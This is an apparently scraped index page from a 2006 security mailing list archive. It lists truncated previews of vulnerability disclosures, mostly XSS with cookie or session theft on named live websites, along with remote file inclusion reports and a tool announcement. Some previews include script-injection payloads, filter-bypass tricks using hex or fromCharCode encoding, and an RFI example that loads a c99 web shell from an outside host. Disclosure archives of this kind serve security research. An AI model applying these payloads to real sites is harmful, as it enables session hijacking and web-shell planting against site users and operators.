|
Colapse all |
Post message
Blogspot.com - XSS with cookie disclosure 2006-06-14 luny youfucktard com Blogspot.com Homepage: http://www.blogspot.com Affected files: Blog input boxes ------------------------------------------ XSS vuln via Display name input box. Blogger doesnt properally sanatize user input before generating it. For example, you can't use illegal characters in your u [ more ] [ reply ] Re: REMOTE FILE INCLUSION ( ALL ) 2006-06-14 eufrato gmail com http://www.root-security.org/danger/boastMachine.txt Was this tried on a running site?or was this just source inspected? in boastmachine folder, the below shouldn't be vulnerable with config.php declaring $bmc_dir. vote.php -------------------------------------- include_once dirname(__FILE_ [ more ] [ reply ] RahnemaCo Remote File Inclusion Exploit 2006-06-14 Breeeeh hotmail com ============================================= Fund By: Breeeeh Special for Site:- www.alshmokh.com nono225-CrAzYCrAcKeR-mHOn-LoverHacker-rageh Sw33t h4ck3r-BoNy_m-Root shill-LiNuX_rOOt ============================================= Example:- /shop/page.php?osCsid=http://yoursite/c99shell.t [ more ] [ reply ] SinFP 2.00 - a major release with many new features 2006-06-15 GomoR (bt gomor org) Download: http://sourceforge.net/projects/sinfp/ Info: http://www.gomor.org/sinfp Mailing list: https://lists.sourceforge.net/lists/listinfo/sinfp-discuss NEWS FOR 2.00: - complete rewrite - sinfp.db completely reworked - new tests based on comparison between probe and response (TCP seq/ac [ more ] [ reply ] Biblenet.net - XSS 2006-06-15 luny youfucktard com Biblenet.net Homepage: http://www.biblenet.net Affected files: gettinginvolved.html register.php member.php /library/index.html ----------------------------------------- Biblespace uses vBulletin for most of their site, so most of these vulns are based in the vbulletin site themselves [ more ] [ reply ] B3ta.com - XSS with cookie disclosure 2006-06-15 luny youfucktard com B3ta.com Homepage: http://www.b3ta.com Affected files: Input boxes of your profile XSS vuln with cookie disclosure via Profile: box. Data isn't correctly sanatized before being generated. We can bypass the filters of the site one way by using img tags and converting our javascript to [ more ] [ reply ] VampireFreaks journal XSS 2006-06-12 nanoymaster gmail com yes the journal is exploitable aswell there seem to be no filters on the journal title so you can simply put: "><script>alert('XSS')</script> also the other places where you can update your journal etc. don't filter anything proof: http://vampirefreaks.com/journal.php?u=NanoyMaster [ more ] [ reply ] webcrawler.com - XSS vulnerability in search-engine 2006-06-13 admin majorsecurity de webcrawler.com - XSS vulnerability ---------------------------------------------- Type: Cross site scripting Date: June, 13th 2006 ---------------------------------------------- Credits: ---------------------------------------------- Discovered by: David "Aesthetico" Vieira-Kurz http://w [ more ] [ reply ] Palm.com - XSS vulnerability 2006-06-13 admin majorsecurity de Palm.com - XSS vulnerability ---------------------------------------------- Type: Cross site scripting Date: June, 13th 2006 ---------------------------------------------- Credits: ---------------------------------------------- Discovered by: David "Aesthetico" Vieira-Kurz http://www.maj [ more ] [ reply ] Ratemylook.co.uk - XSS with session disclosure 2006-06-13 luny youfucktard com Ratemylook.co.uk Homepage: http://www.ratemylook.co.uk Affected files: user.php4 top.php4 hot.php4 toponline.php4 ------------------------------------------------ user.php4 XSS vuln with cookie disclosure: http://www.ratemylook.co.uk/user.php4?uid=1150190681&mode=own">">">'><SC RIPT [ more ] [ reply ] Macworld.com - XSS vulnerability 2006-06-13 admin majorsecurity de Macworld.com - XSS vulnerability ---------------------------------------------- Type: Cross site scripting Rated as: Low Risk Date: June, 13th 2006 ---------------------------------------------- Credits: ---------------------------------------------- Discovered by: David "Aesthetico" V [ more ] [ reply ] Ratescene.co.uk - XSS with session disclosure 2006-06-13 luny youfucktard com Ratescene.co.uk Homepage: http://www.ratescene.co.uk Affected files: input boxes of editing your profile ------------------------------------------------ Profile input boxes XSS vuln with cookie disclosure: Data isn't sanatized, try entering the code below: <img src=javascript:aler [ more ] [ reply ] Facetherating.com - XSS & session disclosure 2006-06-13 luny youfucktard com Facetherating.com Homepage: http://www.facetherating.com Affected files: showprofile.php XSS vuln via showprofile.php: The site does the typical filtering of adding backslashes to ' and " so We'll try something different this time and use a fromCharCode. http://www.facetherating.co [ more ] [ reply ] Windowsitpro.com - XSS with cookie disclosure 2006-06-13 luny youfucktard com Windowsitpro.com Homepage: http://www.windowsitpro.com Effected files: Search input box Downloading whitepapers Search input box xss vuln with cookie disclosure: We convert our javascript to hex format so we don't recieve the default "Your request cannot be processed as this time" err [ more ] [ reply ] Re: PHP Advanced Transfer Manager Download users password hashes 2006-06-13 jn hz6 de The phpatm support forum (currently down) advises administrators to put a .htaccess into the users directory with the following content: # no one gets in here! order allow,deny deny from all Furthermore the website recommends to rename the "users" directory and change the corresponding var [ more ] [ reply ] [Kurdish Security # 8] DCP-Portal Remote File Include Vulnerability [Editor DHTML] 2006-06-13 botan linuxmail org ISO.org - XSS vulnerability 2006-06-13 admin majorsecurity de ISO.org - XSS vulnerability ---------------------------------------------- Type: Cross site scripting Date: June, 13th 2006 ---------------------------------------------- Credits: ---------------------------------------------- Discovered by: David "Aesthetico" Vieira-Kurz http://www.majo [ more ] [ reply ] |
|
Privacy Statement |
PTT.yu Guestbook Vulnebility
============================
Discovered by: us3rg0d
Mail: us3r_g0d (at) yahoo (dot) com [email concealed]
Site: www.us3rg0d.tk
www.cformatkrew.tk
greetz: m3t4b0l1c,Fu3g0,DELTA,Phantom,NeshYu,
skull_boy,Orwell,MetalBOY,[YesPeace],Intruder,
Loading_3rr0r,DrNoise
f
[ more ] [ reply ]